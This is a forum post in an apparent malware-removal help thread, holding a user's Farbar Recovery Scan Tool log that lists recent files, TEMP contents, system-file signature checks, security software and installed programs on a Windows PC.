2014-12-20 16:28 - 2014-12-20 16:28 - 00000000 ____D () C:\Users\April\AppData\Local\{2EAEDE4E-F528-4D8F-9921-DCD486ADD7D8}
2014-12-19 01:54 - 2014-12-19 01:55 - 00000000 ____D () C:\Users\April\AppData\Local\{5690EDFD-0153-4F78-A832-FB2962118B0F}
2014-12-18 13:54 - 2014-12-18 13:54 - 00000000 ____D () C:\Users\April\AppData\Local\{D613960E-ECC1-4DE3-B444-E0413A18B055}
2014-12-18 11:49 - 2014-12-12 22:33 - 00115712 _____ (Microsoft Corporation) C:\windows\system32\ieUnatt.exe
2014-12-18 01:18 - 2014-12-18 01:18 - 00000000 ____D () C:\Users\April\AppData\Local\{D64BEC6F-F2E8-4E31-99BA-35036080796D}
2014-12-17 10:18 - 2014-12-17 10:18 - 00000000 ____D () C:\Users\April\AppData\Local\{FF751368-68AB-4B92-8D45-34F03DBD3B18}
2014-12-17 02:01 - 2014-12-25 05:21 - 00000000 ____D () C:\Users\April\Desktop\LINKS TO LOOK AT
2014-12-16 15:02 - 2014-12-16 15:02 - 00000214 _____ () C:\Users\April\Desktop\(99) Lo Mas Loco Del Face.url
2014-12-16 14:59 - 2014-12-16 14:59 - 00000000 ____D () C:\Users\April\AppData\Local\{D0D21C11-1C78-4162-B1CB-4A1D70A76190}
2014-12-16 02:34 - 2014-12-16 02:34 - 00000237 _____ () C:\Users\April\Desktop\The Holy Spirit.url
2014-12-15 16:53 - 2014-12-15 16:53 - 00000000 ____D () C:\Users\April\AppData\Local\{647BFC14-DC17-4844-9C09-A2A406B3130E}
2014-12-15 05:29 - 2014-12-15 05:29 - 00000164 _____ () C:\Users\April\Desktop\CPSC Home  CPSC.gov.url
2014-12-14 00:49 - 2014-12-14 00:49 - 00000000 ____D () C:\Users\April\AppData\Local\{946D5A84-1501-49EC-8BDC-0509BE21CE08}
2014-12-12 14:00 - 2014-12-12 14:01 - 00000000 ____D () C:\Users\April\AppData\Local\{25A62D4B-AC03-4E0D-B94E-39D01FB39AC7}
2014-12-12 02:22 - 2014-12-12 02:22 - 00000360 _____ () C:\Users\April\Desktop\Easy Gift Ideas Cookies in a Jar – P&G everyday  Home-Garden  P&G Everyday.url
2014-12-11 12:31 - 2014-12-11 12:31 - 00000000 ____D () C:\Users\April\AppData\Local\{FEA54AFB-113D-440C-BC64-16BE7AD78633}
2014-12-10 17:25 - 2014-12-10 17:25 - 00000000 ____D () C:\Users\April\AppData\Local\{BF7F7441-12C0-4EC8-AB3C-F0EAB442FF55}
2014-12-10 05:30 - 2014-12-10 05:32 - 00000000 ____D () C:\Users\April\Desktop\1039 older
2014-12-10 04:11 - 2014-12-10 04:11 - 00000000 ____D () C:\windows\system32\appraiser
2014-12-10 03:54 - 2014-10-17 20:33 - 03209728 _____ (Microsoft Corporation) C:\windows\system32\mf.dll
2014-12-10 03:54 - 2014-07-06 20:40 - 00103424 _____ (Microsoft Corporation) C:\windows\system32\mfps.dll
2014-12-10 03:54 - 2014-07-06 20:39 - 00050176 _____ (Microsoft Corporation) C:\windows\system32\rrinstaller.exe
2014-12-10 03:54 - 2014-07-06 20:39 - 00023040 _____ (Microsoft Corporation) C:\windows\system32\mfpmp.exe
2014-12-10 03:54 - 2014-07-06 20:37 - 00002048 _____ (Microsoft Corporation) C:\windows\system32\mferror.dll
2014-12-09 18:51 - 2014-12-03 23:38 - 00728576 _____ (Microsoft Corporation) C:\windows\system32\appraiser.dll
2014-12-09 18:51 - 2014-12-03 23:38 - 00610304 _____ (Microsoft Corporation) C:\windows\system32\invagent.dll
2014-12-09 18:51 - 2014-12-03 23:38 - 00159744 _____ (Microsoft Corporation) C:\windows\system32\aepic.dll
2014-12-09 18:51 - 2014-12-03 23:34 - 00873984 _____ (Microsoft Corporation) C:\windows\system32\aeinv.dll
2014-12-09 18:51 - 2014-12-01 18:28 - 01160872 _____ (Microsoft Corporation) C:\windows\system32\aitstatic.exe
2014-12-09 18:51 - 2014-11-10 21:44 - 01230336 _____ (Microsoft Corporation) C:\windows\system32\WindowsCodecs.dll
2014-12-09 18:51 - 2014-11-10 20:32 - 00074752 _____ (Microsoft Corporation) C:\windows\system32\Drivers\tdx.sys
2014-12-09 18:50 - 2014-12-03 23:38 - 00337920 _____ (Microsoft Corporation) C:\windows\system32\generaltel.dll
2014-12-09 18:50 - 2014-12-03 23:38 - 00315392 _____ (Microsoft Corporation) C:\windows\system32\devinv.dll
2014-12-09 18:50 - 2014-12-03 23:38 - 00202752 _____ (Microsoft Corporation) C:\windows\system32\aepdu.dll
2014-12-09 18:50 - 2014-11-26 20:10 - 00342200 _____ (Microsoft Corporation) C:\windows\system32\iedkcs32.dll
2014-12-09 18:50 - 2014-11-21 21:22 - 19749376 _____ (Microsoft Corporation) C:\windows\system32\mshtml.dll
2014-12-09 18:50 - 2014-11-21 21:20 - 02724864 _____ (Microsoft Corporation) C:\windows\system32\mshtml.tlb
2014-12-09 18:50 - 2014-11-21 21:20 - 00004096 _____ (Microsoft Corporation) C:\windows\system32\ieetwcollectorres.dll
2014-12-09 18:50 - 2014-11-21 21:07 - 00501248 _____ (Microsoft Corporation) C:\windows\system32\vbscript.dll
2014-12-09 18:50 - 2014-11-21 21:07 - 00062464 _____ (Microsoft Corporation) C:\windows\system32\iesetup.dll
2014-12-09 18:50 - 2014-11-21 21:06 - 00047616 _____ (Microsoft Corporation) C:\windows\system32\ieetwproxystub.dll
2014-12-09 18:50 - 2014-11-21 21:05 - 00064000 _____ (Microsoft Corporation) C:\windows\system32\MshtmlDac.dll
2014-12-09 18:50 - 2014-11-21 21:01 - 02277888 _____ (Microsoft Corporation) C:\windows\system32\iertutil.dll
2014-12-09 18:50 - 2014-11-21 20:59 - 00047104 _____ (Microsoft Corporation) C:\windows\system32\jsproxy.dll
2014-12-09 18:50 - 2014-11-21 20:58 - 00030720 _____ (Microsoft Corporation) C:\windows\system32\iernonce.dll
2014-12-09 18:50 - 2014-11-21 20:56 - 00478208 _____ (Microsoft Corporation) C:\windows\system32\ieui.dll
2014-12-09 18:50 - 2014-11-21 20:55 - 00102912 _____ (Microsoft Corporation) C:\windows\system32\ieetwcollector.exe
2014-12-09 18:50 - 2014-11-21 20:54 - 00620032 _____ (Microsoft Corporation) C:\windows\system32\jscript9diag.dll
2014-12-09 18:50 - 2014-11-21 20:48 - 00667648 _____ (Microsoft Corporation) C:\windows\system32\MsSpellCheckingFacility.exe
2014-12-09 18:50 - 2014-11-21 20:45 - 00418304 _____ (Microsoft Corporation) C:\windows\system32\dxtmsft.dll
2014-12-09 18:50 - 2014-11-21 20:40 - 00060416 _____ (Microsoft Corporation) C:\windows\system32\JavaScriptCollectionAgent.dll
2014-12-09 18:50 - 2014-11-21 20:36 - 00168960 _____ (Microsoft Corporation) C:\windows\system32\msrating.dll
2014-12-09 18:50 - 2014-11-21 20:35 - 00076288 _____ (Microsoft Corporation) C:\windows\system32\mshtmled.dll
2014-12-09 18:50 - 2014-11-21 20:33 - 00285696 _____ (Microsoft Corporation) C:\windows\system32\dxtrans.dll
2014-12-09 18:50 - 2014-11-21 20:29 - 04299264 _____ (Microsoft Corporation) C:\windows\system32\jscript9.dll
2014-12-09 18:50 - 2014-11-21 20:23 - 00688640 _____ (Microsoft Corporation) C:\windows\system32\msfeeds.dll
2014-12-09 18:50 - 2014-11-21 20:23 - 00684544 _____ (Microsoft Corporation) C:\windows\system32\ie4uinit.exe
2014-12-09 18:50 - 2014-11-21 20:22 - 02052096 _____ (Microsoft Corporation) C:\windows\system32\inetcpl.cpl
2014-12-09 18:50 - 2014-11-21 20:21 - 01155072 _____ (Microsoft Corporation) C:\windows\system32\mshtmlmedia.dll
2014-12-09 18:50 - 2014-11-21 20:13 - 12836864 _____ (Microsoft Corporation) C:\windows\system32\ieframe.dll
2014-12-09 18:50 - 2014-11-21 20:00 - 01888256 _____ (Microsoft Corporation) C:\windows\system32\wininet.dll
2014-12-09 18:50 - 2014-11-21 19:56 - 01307136 _____ (Microsoft Corporation) C:\windows\system32\urlmon.dll
2014-12-09 18:50 - 2014-11-21 19:54 - 00710144 _____ (Microsoft Corporation) C:\windows\system32\ieapfltr.dll
2014-12-09 18:49 - 2014-11-07 21:45 - 00002048 _____ (Microsoft Corporation) C:\windows\system32\tzres.dll
2014-12-09 18:48 - 2014-10-29 20:45 - 00155136 _____ (Microsoft Corporation) C:\windows\system32\charmap.exe
2014-12-09 18:48 - 2014-10-02 20:45 - 01177088 _____ (Microsoft Corporation) C:\windows\system32\WsmSvc.dll
2014-12-09 18:48 - 2014-10-02 20:45 - 00248832 _____ (Microsoft Corporation) C:\windows\system32\WSManMigrationPlugin.dll
2014-12-09 18:48 - 2014-10-02 20:45 - 00214016 _____ (Microsoft Corporation) C:\windows\system32\WsmWmiPl.dll
2014-12-09 18:48 - 2014-10-02 20:45 - 00145920 _____ (Microsoft Corporation) C:\windows\system32\WsmAuto.dll
2014-12-09 18:48 - 2014-10-02 20:44 - 00198656 _____ (Microsoft Corporation) C:\windows\system32\WSManHTTPConfig.exe
2014-12-09 15:15 - 2014-12-09 15:15 - 00000000 ____D () C:\Users\April\AppData\Local\{10475705-A45B-4B35-81F3-CEE339A624E0}
2014-12-09 03:14 - 2014-12-09 03:14 - 00000000 ____D () C:\Users\April\AppData\Local\{B53A6077-2E7E-4B78-AA25-AA21CDAB0E76}
2014-12-08 15:14 - 2014-12-08 15:14 - 00000000 ____D () C:\Users\April\AppData\Local\{9D754292-E5DC-4308-A21C-790EDE7112BB}
2014-12-08 02:21 - 2014-12-08 02:21 - 00000000 ____D () C:\Users\April\AppData\Local\{56615F81-04A8-4978-B35D-5C86FDD929EE}
2014-12-06 19:22 - 2014-12-06 19:23 - 00000000 ____D () C:\Users\April\AppData\Local\{4D4E8600-1847-4574-B96C-DE0AD2421513}
2014-12-04 14:43 - 2014-12-04 14:43 - 00000000 ____D () C:\Users\April\AppData\Local\{4B1F3E40-071E-4ABC-A37C-9CBC3F6F093B}
2014-12-03 23:17 - 2014-12-03 23:17 - 00000205 _____ () C:\Users\April\Desktop\nomorerack.com.url
2014-12-03 17:51 - 2014-12-03 17:51 - 00000000 ____D () C:\Users\April\AppData\Local\{02E177BB-8047-4B59-9353-A6038F4D7613}
 
==================== One Month Modified Files and Folders =======
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
2015-01-01 23:43 - 2010-03-16 21:48 - 00000886 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-01-01 23:38 - 2012-03-28 04:29 - 00000830 _____ () C:\windows\Tasks\Adobe Flash Player Updater.job
2015-01-01 18:58 - 2009-10-27 08:25 - 02082610 _____ () C:\windows\WindowsUpdate.log
2015-01-01 13:43 - 2010-03-16 21:48 - 00000882 _____ () C:\windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-01-01 12:31 - 2009-07-13 23:34 - 00018736 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-01-01 12:31 - 2009-07-13 23:34 - 00018736 ____H () C:\windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-01-01 12:26 - 2013-03-28 19:18 - 00000000 ____D () C:\ProgramData\Kodak
2015-01-01 12:24 - 2012-02-22 02:58 - 00000000 ____D () C:\Temp
2015-01-01 12:23 - 2009-07-13 23:53 - 00000006 ____H () C:\windows\Tasks\SA.DAT
2015-01-01 12:23 - 2009-07-13 23:39 - 00163575 _____ () C:\windows\setupact.log
2015-01-01 02:39 - 2014-07-12 14:32 - 00114904 _____ (Malwarebytes Corporation) C:\windows\system32\Drivers\MBAMSwissArmy.sys
2015-01-01 01:07 - 2009-09-03 20:09 - 00782510 _____ () C:\windows\system32\PerfStringBackup.INI
2015-01-01 00:21 - 2009-09-03 20:31 - 00950374 _____ () C:\windows\PFRO.log
2015-01-01 00:17 - 2009-11-27 22:21 - 00000000 ____D () C:\Users\April
2014-12-31 20:29 - 2011-10-14 19:25 - 00000000 ____D () C:\AmericasCardroom
2014-12-31 18:45 - 2014-03-10 16:28 - 00000000 ____D () C:\Users\April\Desktop\POSTPICSFORFB
2014-12-25 05:21 - 2014-03-28 17:11 - 00000000 ____D () C:\Users\April\Desktop\SALE
2014-12-21 23:26 - 2009-12-02 02:04 - 00000000 ____D () C:\Users\April\Desktop\POKER
2014-12-20 22:27 - 2013-03-28 19:31 - 00098038 _____ () C:\Users\April\AppData\Local\installer.log
2014-12-17 09:39 - 2014-07-12 14:31 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-12-17 02:07 - 2014-07-12 14:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-12-17 02:07 - 2012-04-09 19:35 - 00001031 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-12-16 15:56 - 2014-10-16 00:22 - 00000000 ____D () C:\Users\April\Desktop\ALL FROM THIS SIDE
2014-12-14 00:44 - 2009-09-03 20:23 - 00000000 ____D () C:\Program Files\Microsoft Silverlight
2014-12-13 23:22 - 2010-06-04 05:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2014-12-12 10:48 - 2014-08-13 21:05 - 00000000 ____D () C:\Users\April\AppData\Local\Adobe
2014-12-12 10:47 - 2012-03-28 04:29 - 00701616 _____ (Adobe Systems Incorporated) C:\windows\system32\FlashPlayerApp.exe
2014-12-12 10:47 - 2011-05-16 16:03 - 00071344 _____ (Adobe Systems Incorporated) C:\windows\system32\FlashPlayerCPLApp.cpl
2014-12-11 10:44 - 2011-05-14 02:27 - 00000000 ____D () C:\Program Files\PhotoFiltre
2014-12-11 03:12 - 2014-11-06 13:35 - 00000000 ____D () C:\Users\April\Desktop\CAR
2014-12-10 04:11 - 2014-05-06 19:37 - 00000000 ___SD () C:\windows\system32\CompatTel
2014-12-10 04:11 - 2009-07-13 21:37 - 00000000 ____D () C:\windows\AppCompat
2014-12-10 03:55 - 2009-10-27 08:37 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-12-10 03:51 - 2013-07-12 02:52 - 00000000 ____D () C:\windows\system32\MRT
2014-12-10 03:43 - 2009-11-28 03:52 - 109818608 _____ (Microsoft Corporation) C:\windows\system32\MRT.exe
2014-12-04 04:01 - 2013-07-06 17:50 - 00000000 ____D () C:\Users\April\Desktop\HOUSES UPDATE
 
Some content of TEMP:
====================
C:\Users\April\AppData\Local\Temp\6_Offer_15.exe
C:\Users\April\AppData\Local\Temp\Full Flush Poker Updater.exe
C:\Users\April\AppData\Local\Temp\javasysmo1207358081345394113.dll
C:\Users\April\AppData\Local\Temp\javasysmo1628807590474577829.dll
C:\Users\April\AppData\Local\Temp\javasysmo1761121707812716792.dll
C:\Users\April\AppData\Local\Temp\javasysmo2223852071502545994.dll
C:\Users\April\AppData\Local\Temp\javasysmo2315818779424484969.dll
C:\Users\April\AppData\Local\Temp\javasysmo3304135815127925035.dll
C:\Users\April\AppData\Local\Temp\javasysmo3820161635983422442.dll
C:\Users\April\AppData\Local\Temp\javasysmo4822824344328773452.dll
C:\Users\April\AppData\Local\Temp\javasysmo484916868635085645.dll
C:\Users\April\AppData\Local\Temp\javasysmo5423105724221550140.dll
C:\Users\April\AppData\Local\Temp\javasysmo5749812398928454079.dll
C:\Users\April\AppData\Local\Temp\javasysmo6698478116327770814.dll
C:\Users\April\AppData\Local\Temp\javasysmo785673170964680476.dll
C:\Users\April\AppData\Local\Temp\javasysmo7900495085469822409.dll
C:\Users\April\AppData\Local\Temp\javasysmo805063298581186682.dll
C:\Users\April\AppData\Local\Temp\javasysmo809951356480511583.dll
C:\Users\April\AppData\Local\Temp\javasysmo8229446883317656224.dll
C:\Users\April\AppData\Local\Temp\javasysmo8437360746432048315.dll
C:\Users\April\AppData\Local\Temp\javasysmo9178761539779851487.dll
C:\Users\April\AppData\Local\Temp\javasysmo940975743016470114.dll
C:\Users\April\AppData\Local\Temp\jre-7u51-windows-i586-iftw.exe
C:\Users\April\AppData\Local\Temp\jre-7u55-windows-i586-iftw.exe
C:\Users\April\AppData\Local\Temp\kwbxo1eg.dll
C:\Users\April\AppData\Local\Temp\MotoHelper_2.0.51_Driver_5.2.0.exe
C:\Users\April\AppData\Local\Temp\Quarantine.exe
C:\Users\April\AppData\Local\Temp\sqlite3.dll
C:\Users\April\AppData\Local\Temp\v2ote5em.dll
C:\Users\April\AppData\Local\Temp\_unps.exe
C:\Users\April\AppData\Local\Temp\{A9D35BAE-EED3-4C13-ADE2-D45D35377C07}-chrome_updater.exe
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\windows\explorer.exe => File is digitally signed
C:\windows\system32\winlogon.exe => File is digitally signed
C:\windows\system32\wininit.exe => File is digitally signed
C:\windows\system32\svchost.exe => File is digitally signed
C:\windows\system32\services.exe => File is digitally signed
C:\windows\system32\User32.dll => File is digitally signed
C:\windows\system32\userinit.exe => File is digitally signed
C:\windows\system32\rpcss.dll => File is digitally signed
C:\windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-10-28 15:23
 
==================== End Of Log ============================

  • 0

#12
JUSTME1969

JUSTME1969

    Member

  • Topic Starter
  • Member
  • PipPip
  • 32 posts

Addition txt 

 

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 01-01-2015
Ran by April at 2015-01-02 00:15:36
Running from C:\Users\April\Desktop
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: avast! Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: avast! Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Aced.com (HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\Aced.com) (Version: 6.0 - )
Adobe AIR (HKLM\...\Adobe AIR) (Version: 14.0.0.178 - Adobe Systems Incorporated)
Adobe Flash Player 15 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 15.0.0.246 - Adobe Systems Incorporated)
Adobe Flash Player 16 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 16.0.0.235 - Adobe Systems Incorporated)
Adobe Reader X (10.1.12) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.12 - Adobe Systems Incorporated)
Adobe Shockwave Player 11.6 (HKLM\...\Adobe Shockwave Player) (Version: 11.6.3.633 - Adobe Systems, Inc.)
aioscnnr (Version: 5.8.10.0 - Your Company Name) Hidden
aioscnnr (Version: 7.6.13.10 - Your Company Name) Hidden
AmericasCardroom (HKLM\...\296836EA-EF3A-4C36-8C13-3A6C1DB2D4BE) (Version: 16.0 - IGSoft)
Apple Application Support (HKLM\...\{5D09C772-ECB3-442B-9CC6-B4341C78FDC2}) (Version: 2.3.4 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{E14ADE0E-75F3-4A46-87E5-26692DD626EC}) (Version: 6.1.0.13 - Apple Inc.)
Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Attack Poker 1.0.1.266 (HKLM\...\Attack Poker_is1) (Version:  - )
Avast Free Antivirus (HKLM\...\avast) (Version: 10.0.2208 - AVAST Software)
BetOnline Poker 8.2 (HKLM\...\BetOnline Poker 8.2) (Version: 8.2.12.201404151600 - Hero Poker Network)
BlackChipPoker (HKLM\...\FE4D6F94-B3D5-484b-94F7-8BC45DEB7A82) (Version: 16.6 - IGSoft)
Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)
BovadaPoker (HKLM\...\{D7CA2DF8-95CE-4C80-9296-98E21219A1E5}}_is1) (Version:   - )
C4USelfUpdater (Version: 1.00.0000 - Your Company Name) Hidden
CarbonPoker (HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\CarbonPoker) (Version: 5.0 - )
center (Version: 7.8.0.0 - Eastman Kodak Company) Hidden
Colt Poker (HKLM\...\Colt Poker) (Version: 2.0.1.4006 - Colt Poker) <==== ATTENTION!
Comcast Desktop Software (v1.2.0.9) (HKLM\...\{CEF7211D-CE3A-44C4-B321-D84A2099AE94}) (Version: 23 - Comcast)
Compatibility Pack for the 2007 Office system (HKLM\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
D3DX10 (Version: 15.4.2368.0902 - Microsoft) Hidden
ESPN Version 2.0.7.21 (HKLM\...\ESPN_is1) (Version:  - ESPN)
essentials (Version: 7.8.0.0 - Eastman Kodak Company) Hidden
Full Flush Poker 8.2 (HKLM\...\Full Flush Poker 8.2) (Version: 8.2.12.201310281100 - Full Flush Poker)
Gadwin PrintScreen (HKLM\...\Gadwin PrintScreen) (Version: 4.6 - Gadwin Systems, Inc.)
Google Chrome (HKLM\...\Google Chrome) (Version: 39.0.2171.95 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.5111.1712 - Google Inc.)
Google Toolbar for Internet Explorer (Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (Version: 1.3.25.11 - Google Inc.) Hidden
GridPoker (HKLM\...\{516D6624-97F2-4F28-8FFA-8D157D9BBD4F}) (Version: 1.1.0238 - Fastgrid Ltd)
Intel® Graphics Media Accelerator Driver (HKLM\...\HDMI) (Version: 8.15.10.1883 - Intel Corporation)
Intel® Matrix Storage Manager (HKLM\...\{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}) (Version:  - Intel Corporation)
Intertops Poker (HKLM\...\Intertops Poker) (Version:  - )
iTunes (HKLM\...\{11E568E0-3244-4BCB-875E-F334269DFDCB}) (Version: 11.0.3.42 - Apple Inc.)
Java 7 Update 67 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F03217067FF}) (Version: 7.0.670 - Oracle)
Java 8 Update 25 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83218025F0}) (Version: 8.0.250 - Oracle Corporation)
Junk Mail filter update (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Kodak AIO Printer (Version: 7.8.1.0 - Eastman Kodak Company) Hidden
KODAK AiO Software (HKLM\...\{E0F274B7-592B-4669-8FB8-8D9825A09858}) (Version: 7.8.5.2 - Eastman Kodak Company)
[email protected] 1.0 (HKLM\...\{0D795777-9D60-4692-8386-F2B3F2B5E5BF}) (Version: 1.0 - Corel)
Lock Poker (HKLM\...\Lock Poker) (Version: 1.0.11423 - LockPoker)
Malwarebytes Anti-Malware version 2.0.4.1028 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.4.1028 - Malwarebytes Corporation)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{91120000-002F-0000-0000-0000000FF1CE}_HOMESTUDENTR_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Home and Student 2007 (HKLM\...\HOMESTUDENTR) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.31211.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 ATL Update kb973923 - x86 8.0.50727.4053 (HKLM\...\{770657D0-A123-3C07-8E44-1C83EC895118}) (Version: 8.0.50727.4053 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - KB2467174 - x86 9.0.30729.5570 (HKLM\...\{86CE85E6-DBAC-3FFD-B977-E4B79F83C909}) (Version: 9.0.30729.5570 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Works (HKLM\...\{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}) (Version: 9.7.0621 - Microsoft Corporation)
MotoHelper 2.1.32 Driver 5.4.0 (HKLM\...\MotoHelper) (Version: 2.1.32 - Motorola)
MotoHelper MergeModules (Version: 1.2.0 - Motorola) Hidden
MOTOROLA MEDIA LINK (HKLM\...\{378397D6-FD32-4092-A854-6A75CB7EDA46}) (Version: 1.5.4090.2 - Motorola)
Motorola Mobile Drivers Installation 5.4.0 (Version: 5.4.0 - Motorola Inc.) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Music Oasis (HKLM\...\{c6c214df-2922-4809-94aa-f4d67d4451ec}) (Version: 1.0.0 - W3i, LLC)
MyToshiba (HKLM\...\{01250B8F-D947-4F8A-9408-FE8E3EE2EC92}) (Version: 2.2.0.3 - Toshiba)
NetZero Launcher (HKLM\...\{9AEAF9CC-390B-49C0-8F7F-14092BF163B6}) (Version: 2.01 - TOSHIBA Corporation)
NLOP (HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\NLOP) (Version:  - Power Play Development)
NoPayPOKER (HKLM\...\NoPayPOKER_is1) (Version:  - )
ocr (Version: 6.2.3.50 - Eastman Kodak Company) Hidden
OGA Notifier 2.0.0048.0 (Version: 2.0.0048.0 - Microsoft Corporation) Hidden
PhotoFiltre (HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\PhotoFiltre) (Version:  - )
PlayReady PC Runtime x86 (HKLM\...\{CCA5EAAD-92F4-4B7A-B5EE-14294C66AB61}) (Version: 1.3.0 - Microsoft Corporation)
Poker Host (HKU\S-1-5-21-692471023-1834078390-643647909-1001\...\Poker Host) (Version: 5.0 - )
Poker Rebel 1.0 (HKLM\...\{7DB4BC53-AD0C-485F-8D5B-D98B01AC9A2A}_is1) (Version: 1.0 - Entertain ME LLC)
PokerStars.net (HKLM\...\PokerStars.net) (Version:  - PokerStars.net)
PreReq (Version: 6.2.4.0 - Eastman Kodak Company) Hidden
PrintProjects (HKLM\...\PrintProjects) (Version: 1.0.0.9282 - RocketLife Inc.)
Quickbooks Financial Center (HKLM\...\{3B843B38-04B1-4CE6-8888-586273E0F289}) (Version: 2.02 - TOSHIBA Corporation)
QuickTime 7 (HKLM\...\{111EE7DF-FC45-40C7-98A7-753AC46B12FB}) (Version: 7.75.80.95 - Apple Inc.)
Realtek Ethernet Controller  Driver (HKLM\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 1.00.0008 - Realtek)
Realtek High Definition Audio Driver (HKLM\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5904 - Realtek Semiconductor Corp.)
Realtek USB 2.0 Card Reader (HKLM\...\{96AE7E41-E34E-47D0-AC07-1091A8127911}) (Version: 6.1.7600.30101 - Realtek Semiconductor Corp.)
Realtek WLAN Driver (HKLM\...\{0FB630AB-7BD8-40AE-B223-60397D57C3C9}) (Version: 2.00.0006 - Realtek)
Sandboxie 3.54 (32-bit) (HKLM\...\Sandboxie) (Version:  - )
Sharks Den Poker (HKLM\...\com.teamodc.sharksdenpoker.E54FAB7AFFA7DC546BACB249B6BFF74B58FC797F.1) (Version: 1.2.404 - UNKNOWN)
Sharks Den Poker (Version: 1.2.404 - UNKNOWN) Hidden
Skype Click to Call (HKLM\...\{B6CF2967-C81E-40C0-9815-C05774FEF120}) (Version: 6.6.11664 - Skype Technologies S.A.)
Skype Launcher (HKLM\...\{DA84ECBF-4B79-47F2-B34C-95C38484C058}) (Version: 2.01 - TOSHIBA Corporation)
Skype™ 6.11 (HKLM\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.11.102 - Skype Technologies S.A.)
swMSM (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
